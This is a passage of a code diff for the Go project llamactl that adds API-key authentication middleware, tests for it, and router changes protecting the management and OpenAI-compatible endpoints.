|
||||
return
|
||||
}
|
||||
@@ -261,6 +272,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
|
||||
// @Summary Stop a running instance
|
||||
// @Description Stops a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Stopped instance details"
|
||||
@@ -275,14 +287,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.StopInstance(name)
|
||||
inst, err := h.InstanceManager.StopInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -293,6 +305,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
|
||||
// @Summary Restart a running instance
|
||||
// @Description Restarts a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Restarted instance details"
|
||||
@@ -307,14 +320,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.RestartInstance(name)
|
||||
inst, err := h.InstanceManager.RestartInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -325,6 +338,7 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
|
||||
// @Summary Delete an instance
|
||||
// @Description Stops and removes a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 204 "No Content"
|
||||
// @Failure 400 {string} string "Invalid name format"
|
||||
@@ -351,6 +365,7 @@ func (h *Handler) DeleteInstance() http.HandlerFunc {
|
||||
// @Summary Get logs from a specific instance
|
||||
// @Description Returns the logs from a specific instance by name with optional line limit
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
|
||||
// @Produces text/plain
|
||||
@@ -377,13 +392,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
logs, err := instance.GetLogs(num_lines)
|
||||
logs, err := inst.GetLogs(num_lines)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -398,6 +413,7 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
|
||||
// @Summary Proxy requests to a specific instance
|
||||
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 "Request successfully proxied to instance"
|
||||
// @Failure 400 {string} string "Invalid name format"
|
||||
@@ -413,19 +429,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||
return
|
||||
}
|
||||
|
||||
// Get the cached proxy for this instance
|
||||
proxy, err := instance.GetProxy()
|
||||
proxy, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -462,6 +478,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
|
||||
// @Summary List instances in OpenAI-compatible format
|
||||
// @Description Returns a list of instances in a format compatible with OpenAI API
|
||||
// @Tags openai
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -475,11 +492,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
|
||||
}
|
||||
|
||||
openaiInstances := make([]OpenAIInstance, len(instances))
|
||||
for i, instance := range instances {
|
||||
for i, inst := range instances {
|
||||
openaiInstances[i] = OpenAIInstance{
|
||||
ID: instance.Name,
|
||||
ID: inst.Name,
|
||||
Object: "model",
|
||||
Created: instance.Created,
|
||||
Created: inst.Created,
|
||||
OwnedBy: "llamactl",
|
||||
}
|
||||
}
|
||||
@@ -499,8 +516,9 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
|
||||
|
||||
// OpenAIProxy godoc
|
||||
// @Summary OpenAI-compatible proxy endpoint
|
||||
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body
|
||||
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
|
||||
// @Tags openai
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Success 200 "OpenAI response"
|
||||
@@ -530,19 +548,19 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
// Route to the appropriate instance based on model name
|
||||
instance, err := h.InstanceManager.GetInstance(modelName)
|
||||
// Route to the appropriate inst based on model name
|
||||
inst, err := h.InstanceManager.GetInstance(modelName)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||
return
|
||||
}
|
||||
|
||||
proxy, err := instance.GetProxy()
|
||||
proxy, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||
return
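A client-side sketch of the OpenAI-compatible routing above: the "model" field in the request body selects which managed instance receives the request. The host, port, path, and key are placeholders, not values taken from this diff:

package main

import (
    "bytes"
    "io"
    "net/http"
    "os"
)

func main() {
    // "my-instance" must match the name of a running llamactl instance.
    body := []byte(`{"model":"my-instance","messages":[{"role":"user","content":"Hello"}]}`)
    req, _ := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(body))
    req.Header.Set("Content-Type", "application/json")
    req.Header.Set("Authorization", "Bearer sk-inference-...") // inference or management key
    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()
    io.Copy(os.Stdout, resp.Body)
}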
pkg/server/middleware.go (new file, 189 lines)
@@ -0,0 +1,189 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"crypto/subtle"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type KeyType int
|
||||
|
||||
const (
|
||||
KeyTypeInference KeyType = iota
|
||||
KeyTypeManagement
|
||||
)
|
||||
|
||||
type APIAuthMiddleware struct {
|
||||
requireInferenceAuth bool
|
||||
inferenceKeys map[string]bool
|
||||
requireManagementAuth bool
|
||||
managementKeys map[string]bool
|
||||
}
|
||||
|
||||
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
|
||||
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
|
||||
|
||||
var generated bool = false
|
||||
|
||||
inferenceAPIKeys := make(map[string]bool)
|
||||
managementAPIKeys := make(map[string]bool)
|
||||
|
||||
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
|
||||
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
|
||||
key := generateAPIKey(KeyTypeManagement)
|
||||
managementAPIKeys[key] = true
|
||||
generated = true
|
||||
fmt.Printf("%s\n⚠️ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
|
||||
}
|
||||
for _, key := range authCfg.ManagementKeys {
|
||||
managementAPIKeys[key] = true
|
||||
}
|
||||
|
||||
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
|
||||
key := generateAPIKey(KeyTypeInference)
|
||||
inferenceAPIKeys[key] = true
|
||||
generated = true
|
||||
fmt.Printf("%s\n⚠️ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
|
||||
}
|
||||
for _, key := range authCfg.InferenceKeys {
|
||||
inferenceAPIKeys[key] = true
|
||||
}
|
||||
|
||||
if generated {
|
||||
fmt.Printf("%s\n⚠️ IMPORTANT\n%s\n", banner, banner)
|
||||
fmt.Println("• These keys are auto-generated and will change on restart")
|
||||
fmt.Println("• For production, add explicit keys to your configuration")
|
||||
fmt.Println("• Copy these keys before they disappear from the terminal")
|
||||
fmt.Println(banner)
|
||||
}
|
||||
|
||||
return &APIAuthMiddleware{
|
||||
requireInferenceAuth: authCfg.RequireInferenceAuth,
|
||||
inferenceKeys: inferenceAPIKeys,
|
||||
requireManagementAuth: authCfg.RequireManagementAuth,
|
||||
managementKeys: managementAPIKeys,
|
||||
}
|
||||
}
|
||||
|
||||
// generateAPIKey creates a cryptographically secure API key
|
||||
func generateAPIKey(keyType KeyType) string {
|
||||
// Generate 32 random bytes (256 bits)
|
||||
randomBytes := make([]byte, 32)
|
||||
|
||||
var prefix string
|
||||
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
prefix = "sk-inference"
|
||||
case KeyTypeManagement:
|
||||
prefix = "sk-management"
|
||||
default:
|
||||
prefix = "sk-unknown"
|
||||
}
|
||||
|
||||
if _, err := rand.Read(randomBytes); err != nil {
|
||||
log.Printf("Warning: Failed to generate secure random key, using fallback")
|
||||
// Fallback to a less secure method if crypto/rand fails
|
||||
return fmt.Sprintf("%s-fallback-%d", prefix, os.Getpid())
|
||||
}
|
||||
|
||||
// Convert to hex and add prefix
|
||||
return fmt.Sprintf("%s-%s", prefix, hex.EncodeToString(randomBytes))
|
||||
}
|
||||
|
||||
// AuthMiddleware returns a middleware that checks API keys for the given key type
|
||||
func (a *APIAuthMiddleware) AuthMiddleware(keyType KeyType) func(http.Handler) http.Handler {
|
||||
return func(next http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method == "OPTIONS" {
|
||||
next.ServeHTTP(w, r)
|
||||
return
|
||||
}
|
||||
|
||||
apiKey := a.extractAPIKey(r)
|
||||
if apiKey == "" {
|
||||
a.unauthorized(w, "Missing API key")
|
||||
return
|
||||
}
|
||||
|
||||
var isValid bool
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
// Management keys also work for OpenAI endpoints (higher privilege)
|
||||
isValid = a.isValidKey(apiKey, KeyTypeInference) || a.isValidKey(apiKey, KeyTypeManagement)
|
||||
case KeyTypeManagement:
|
||||
isValid = a.isValidKey(apiKey, KeyTypeManagement)
|
||||
default:
|
||||
isValid = false
|
||||
}
|
||||
|
||||
if !isValid {
|
||||
a.unauthorized(w, "Invalid API key")
|
||||
return
|
||||
}
|
||||
|
||||
next.ServeHTTP(w, r)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// extractAPIKey extracts the API key from the request
|
||||
func (a *APIAuthMiddleware) extractAPIKey(r *http.Request) string {
|
||||
// Check Authorization header: "Bearer sk-..."
|
||||
if auth := r.Header.Get("Authorization"); auth != "" {
|
||||
if after, ok := strings.CutPrefix(auth, "Bearer "); ok {
|
||||
return after
|
||||
}
|
||||
}
|
||||
|
||||
// Check X-API-Key header
|
||||
if apiKey := r.Header.Get("X-API-Key"); apiKey != "" {
|
||||
return apiKey
|
||||
}
|
||||
|
||||
// Check query parameter
|
||||
if apiKey := r.URL.Query().Get("api_key"); apiKey != "" {
|
||||
return apiKey
|
||||
}
|
||||
|
||||
return ""
|
||||
}
|
||||
|
||||
// isValidKey checks if the provided API key is valid for the given key type
|
||||
func (a *APIAuthMiddleware) isValidKey(providedKey string, keyType KeyType) bool {
|
||||
var validKeys map[string]bool
|
||||
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
validKeys = a.inferenceKeys
|
||||
case KeyTypeManagement:
|
||||
validKeys = a.managementKeys
|
||||
default:
|
||||
return false
|
||||
}
|
||||
|
||||
for validKey := range validKeys {
|
||||
if len(providedKey) == len(validKey) &&
|
||||
subtle.ConstantTimeCompare([]byte(providedKey), []byte(validKey)) == 1 {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// unauthorized sends an unauthorized response
|
||||
func (a *APIAuthMiddleware) unauthorized(w http.ResponseWriter, message string) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
w.WriteHeader(http.StatusUnauthorized)
|
||||
response := fmt.Sprintf(`{"error": {"message": "%s", "type": "authentication_error"}}`, message)
|
||||
w.Write([]byte(response))
|
||||
}
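A short usage sketch of the middleware in package server: the AuthMiddleware, NewAPIAuthMiddleware, and key-type API is the one defined above, while the route paths and the source of the AuthConfig are illustrative:

// Sketch only: paths and config plumbing are assumptions.
func protectedMux(h *Handler, authCfg config.AuthConfig) *http.ServeMux {
    authMW := NewAPIAuthMiddleware(authCfg)
    mux := http.NewServeMux()
    // Management endpoints accept management keys only.
    mux.Handle("/api/v1/instances", authMW.AuthMiddleware(KeyTypeManagement)(h.ListInstances()))
    // OpenAI-compatible endpoints accept inference keys; management keys also pass.
    mux.Handle("/v1/models", authMW.AuthMiddleware(KeyTypeInference)(h.OpenAIListInstances()))
    return mux
}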
pkg/server/middleware_test.go (new file, 354 lines)
@@ -0,0 +1,354 @@
|
||||
package server_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/server"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestAuthMiddleware(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
keyType server.KeyType
|
||||
inferenceKeys []string
|
||||
managementKeys []string
|
||||
requestKey string
|
||||
method string
|
||||
expectedStatus int
|
||||
}{
|
||||
// Valid key tests
|
||||
{
|
||||
name: "valid inference key for inference",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{"sk-inference-valid123"},
|
||||
requestKey: "sk-inference-valid123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
{
|
||||
name: "valid management key for inference", // Management keys work for inference
|
||||
keyType: server.KeyTypeInference,
|
||||
managementKeys: []string{"sk-management-admin123"},
|
||||
requestKey: "sk-management-admin123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
{
|
||||
name: "valid management key for management",
|
||||
keyType: server.KeyTypeManagement,
|
||||
managementKeys: []string{"sk-management-admin123"},
|
||||
requestKey: "sk-management-admin123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
|
||||
		// Invalid key tests
		{
			name:           "inference key for management should fail",
			keyType:        server.KeyTypeManagement,
			inferenceKeys:  []string{"sk-inference-user123"},
			requestKey:     "sk-inference-user123",
			method:         "GET",
			expectedStatus: http.StatusUnauthorized,
		},
		{
			name:           "invalid inference key",
			keyType:        server.KeyTypeInference,
			inferenceKeys:  []string{"sk-inference-valid123"},
			requestKey:     "sk-inference-invalid",
			method:         "GET",
			expectedStatus: http.StatusUnauthorized,
		},
		{
			name:           "missing inference key",
			keyType:        server.KeyTypeInference,
			inferenceKeys:  []string{"sk-inference-valid123"},
			requestKey:     "",
			method:         "GET",
			expectedStatus: http.StatusUnauthorized,
		},
		{
			name:           "invalid management key",
			keyType:        server.KeyTypeManagement,
			managementKeys: []string{"sk-management-valid123"},
			requestKey:     "sk-management-invalid",
			method:         "GET",
			expectedStatus: http.StatusUnauthorized,
		},
		{
			name:           "missing management key",
			keyType:        server.KeyTypeManagement,
			managementKeys: []string{"sk-management-valid123"},
			requestKey:     "",
			method:         "GET",
			expectedStatus: http.StatusUnauthorized,
		},

		// OPTIONS requests should always pass
		{
			name:           "OPTIONS request bypasses inference auth",
			keyType:        server.KeyTypeInference,
			inferenceKeys:  []string{"sk-inference-valid123"},
			requestKey:     "",
			method:         "OPTIONS",
			expectedStatus: http.StatusOK,
		},
		{
			name:           "OPTIONS request bypasses management auth",
			keyType:        server.KeyTypeManagement,
			managementKeys: []string{"sk-management-valid123"},
			requestKey:     "",
			method:         "OPTIONS",
			expectedStatus: http.StatusOK,
		},

		// Cross-key-type validation
		{
			name:           "management key works for inference endpoint",
			keyType:        server.KeyTypeInference,
			inferenceKeys:  []string{},
			managementKeys: []string{"sk-management-admin"},
			requestKey:     "sk-management-admin",
			method:         "POST",
			expectedStatus: http.StatusOK,
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			cfg := config.AuthConfig{
				InferenceKeys:  tt.inferenceKeys,
				ManagementKeys: tt.managementKeys,
			}
			middleware := server.NewAPIAuthMiddleware(cfg)

			// Create test request
			req := httptest.NewRequest(tt.method, "/test", nil)
			if tt.requestKey != "" {
				req.Header.Set("Authorization", "Bearer "+tt.requestKey)
			}

			// Create test handler using the appropriate middleware
			var handler http.Handler
			if tt.keyType == server.KeyTypeInference {
				handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
			} else {
				handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
			}

			// Execute request
			recorder := httptest.NewRecorder()
			handler.ServeHTTP(recorder, req)

			if recorder.Code != tt.expectedStatus {
				t.Errorf("AuthMiddleware() status = %v, expected %v", recorder.Code, tt.expectedStatus)
			}

			// Check that unauthorized responses have proper format
			if recorder.Code == http.StatusUnauthorized {
				contentType := recorder.Header().Get("Content-Type")
				if contentType != "application/json" {
					t.Errorf("Unauthorized response Content-Type = %v, expected application/json", contentType)
				}

				body := recorder.Body.String()
				if !strings.Contains(body, `"type": "authentication_error"`) {
					t.Errorf("Unauthorized response missing proper error type: %v", body)
				}
			}
		})
	}
}

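A note on the format check above: only the JSON content type and the "type": "authentication_error" value are pinned down by the test, so the full 401 body sketched here is an assumption rather than the server's confirmed output.

// Assumed example of a 401 body; the test only requires
// Content-Type: application/json and a "type": "authentication_error" field.
const exampleUnauthorizedBody = `{
  "error": {
    "message": "Invalid or missing API key",
    "type": "authentication_error"
  }
}`
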
func TestGenerateAPIKey(t *testing.T) {
	tests := []struct {
		name    string
		keyType server.KeyType
	}{
		{"inference key generation", server.KeyTypeInference},
		{"management key generation", server.KeyTypeManagement},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Test auto-generation by creating config that will trigger it
			var config config.AuthConfig
			if tt.keyType == server.KeyTypeInference {
				config.RequireInferenceAuth = true
				config.InferenceKeys = []string{} // Empty to trigger generation
			} else {
				config.RequireManagementAuth = true
				config.ManagementKeys = []string{} // Empty to trigger generation
			}

			// Create middleware - this should trigger key generation
			middleware := server.NewAPIAuthMiddleware(config)

			// Test that auth is required (meaning a key was generated)
			req := httptest.NewRequest("GET", "/", nil)
			recorder := httptest.NewRecorder()

			var handler http.Handler
			if tt.keyType == server.KeyTypeInference {
				handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
			} else {
				handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
			}

			handler.ServeHTTP(recorder, req)

			// Should be unauthorized without a key (proving that a key was generated and auth is working)
			if recorder.Code != http.StatusUnauthorized {
				t.Errorf("Expected unauthorized without key, got status %v", recorder.Code)
			}

			// Test uniqueness by creating another middleware instance
			middleware2 := server.NewAPIAuthMiddleware(config)

			req2 := httptest.NewRequest("GET", "/", nil)
			recorder2 := httptest.NewRecorder()

			if tt.keyType == server.KeyTypeInference {
				handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
				handler2.ServeHTTP(recorder2, req2)
			} else {
				handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))
				handler2.ServeHTTP(recorder2, req2)
			}

			// Both should require auth (proving keys were generated for both instances)
			if recorder2.Code != http.StatusUnauthorized {
				t.Errorf("Expected unauthorized for second middleware without key, got status %v", recorder2.Code)
			}
		})
	}
}

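The auto-generation itself is only observed indirectly here (auth becomes required even though no keys were configured). A rough sketch of what such a generator could look like follows; the real implementation lives in the server package and is not part of this diff, so treat every detail as an assumption.

package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// generateKeySketch is illustrative only; it assumes prefixed random keys in the
// style of the test fixtures ("sk-inference-...", "sk-management-...").
func generateKeySketch(prefix string) (string, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return "", err
	}
	return prefix + hex.EncodeToString(buf), nil
}

func main() {
	key, err := generateKeySketch("sk-management-")
	if err != nil {
		panic(err)
	}
	fmt.Println(key)
}
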
func TestAutoGeneration(t *testing.T) {
	tests := []struct {
		name               string
		requireInference   bool
		requireManagement  bool
		providedInference  []string
		providedManagement []string
		shouldGenerateInf  bool // Whether inference key should be generated
		shouldGenerateMgmt bool // Whether management key should be generated
	}{
		{
			name:               "inference auth required, keys provided - no generation",
			requireInference:   true,
			requireManagement:  false,
			providedInference:  []string{"sk-inference-provided"},
			providedManagement: []string{},
			shouldGenerateInf:  false,
			shouldGenerateMgmt: false,
		},
		{
			name:               "inference auth required, no keys - should auto-generate",
			requireInference:   true,
			requireManagement:  false,
			providedInference:  []string{},
			providedManagement: []string{},
			shouldGenerateInf:  true,
			shouldGenerateMgmt: false,
		},
		{
			name:               "management auth required, keys provided - no generation",
			requireInference:   false,
			requireManagement:  true,
			providedInference:  []string{},
			providedManagement: []string{"sk-management-provided"},
			shouldGenerateInf:  false,
			shouldGenerateMgmt: false,
		},
		{
			name:               "management auth required, no keys - should auto-generate",
			requireInference:   false,
			requireManagement:  true,
			providedInference:  []string{},
			providedManagement: []string{},
			shouldGenerateInf:  false,
			shouldGenerateMgmt: true,
		},
		{
			name:               "both required, both provided - no generation",
			requireInference:   true,
			requireManagement:  true,
			providedInference:  []string{"sk-inference-provided"},
			providedManagement: []string{"sk-management-provided"},
			shouldGenerateInf:  false,
			shouldGenerateMgmt: false,
		},
		{
			name:               "both required, none provided - should auto-generate both",
			requireInference:   true,
			requireManagement:  true,
			providedInference:  []string{},
			providedManagement: []string{},
			shouldGenerateInf:  true,
			shouldGenerateMgmt: true,
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			cfg := config.AuthConfig{
				RequireInferenceAuth:  tt.requireInference,
				RequireManagementAuth: tt.requireManagement,
				InferenceKeys:         tt.providedInference,
				ManagementKeys:        tt.providedManagement,
			}

			middleware := server.NewAPIAuthMiddleware(cfg)

			// Test inference behavior if inference auth is required
			if tt.requireInference {
				req := httptest.NewRequest("GET", "/v1/models", nil)
				recorder := httptest.NewRecorder()

				handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))

				handler.ServeHTTP(recorder, req)

				// Should always be unauthorized without a key (since middleware assumes auth is required)
				if recorder.Code != http.StatusUnauthorized {
					t.Errorf("Expected unauthorized for inference without key, got status %v", recorder.Code)
				}
			}

			// Test management behavior if management auth is required
			if tt.requireManagement {
				req := httptest.NewRequest("GET", "/api/v1/instances", nil)
				recorder := httptest.NewRecorder()

				handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
					w.WriteHeader(http.StatusOK)
				}))

				handler.ServeHTTP(recorder, req)

				// Should always be unauthorized without a key (since middleware assumes auth is required)
				if recorder.Code != http.StatusUnauthorized {
					t.Errorf("Expected unauthorized for management without key, got status %v", recorder.Code)
				}
			}
		})
	}
}

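Taken together, these tests pin down the client contract: management endpoints under /api/v1 expect a Bearer key in the Authorization header. A minimal client sketch, assuming a llamactl server on localhost:8080 and a placeholder key:

package main

import (
	"fmt"
	"io"
	"net/http"
)

func main() {
	// Assumed local address and key; adjust to your deployment.
	req, err := http.NewRequest("GET", "http://localhost:8080/api/v1/instances", nil)
	if err != nil {
		panic(err)
	}
	req.Header.Set("Authorization", "Bearer sk-management-your-key-here")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(body))
}
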
@@ -1,4 +1,4 @@
package llamactl
package server

type OpenAIListInstancesResponse struct {
	Object string `json:"object"`
@@ -1,4 +1,4 @@
package llamactl
package server

import (
	"fmt"
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {

	// Add CORS middleware
	r.Use(cors.Handler(cors.Options{
		AllowedOrigins: handler.config.Server.AllowedOrigins,
		AllowedOrigins: handler.cfg.Server.AllowedOrigins,
		AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
		AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
		ExposedHeaders: []string{"Link"},
@@ -26,12 +26,22 @@ func SetupRouter(handler *Handler) *chi.Mux {
		MaxAge: 300,
	}))

	r.Get("/swagger/*", httpSwagger.Handler(
		httpSwagger.URL("/swagger/doc.json"),
	))
	// Add API authentication middleware
	authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)

	if handler.cfg.Server.EnableSwagger {
		r.Get("/swagger/*", httpSwagger.Handler(
			httpSwagger.URL("/swagger/doc.json"),
		))
	}

	// Define routes
	r.Route("/api/v1", func(r chi.Router) {

		if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
			r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
		}

		r.Route("/server", func(r chi.Router) {
			r.Get("/help", handler.HelpHandler())
			r.Get("/version", handler.VersionHandler())
@@ -61,17 +71,25 @@ func SetupRouter(handler *Handler) *chi.Mux {
		})
	})

	r.Get(("/v1/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
	r.Route(("/v1"), func(r chi.Router) {

	// OpenAI-compatible proxy endpoint
	// Handles all POST requests to /v1/*, including:
	// - /v1/completions
	// - /v1/chat/completions
	// - /v1/embeddings
	// - /v1/rerank
	// - /v1/reranking
	// The instance/model to use is determined by the request body.
	r.Post("/v1/*", handler.OpenAIProxy())
		if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
			r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
		}

		r.Get(("/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format

		// OpenAI-compatible proxy endpoint
		// Handles all POST requests to /v1/*, including:
		// - /v1/completions
		// - /v1/chat/completions
		// - /v1/embeddings
		// - /v1/rerank
		// - /v1/reranking
		// The instance/model to use is determined by the request body.
		r.Post("/*", handler.OpenAIProxy())

	})

	// Serve WebUI files
	if err := webui.SetupWebUI(r); err != nil {
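As the route comments say, the proxy picks the target instance from the request body, so the OpenAI-style "model" field carries the instance name. A hedged request sketch follows; the instance name, port, and key are placeholders, not values taken from this diff.

package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// "my-instance" must match the name of a llamactl instance.
	payload := []byte(`{
		"model": "my-instance",
		"messages": [{"role": "user", "content": "Hello"}]
	}`)

	req, err := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(payload))
	if err != nil {
		panic(err)
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer sk-inference-your-key-here") // only needed if inference auth is enabled

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(body))
}
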
pkg/testutil/helpers.go (new file, 10 lines)
@@ -0,0 +1,10 @@
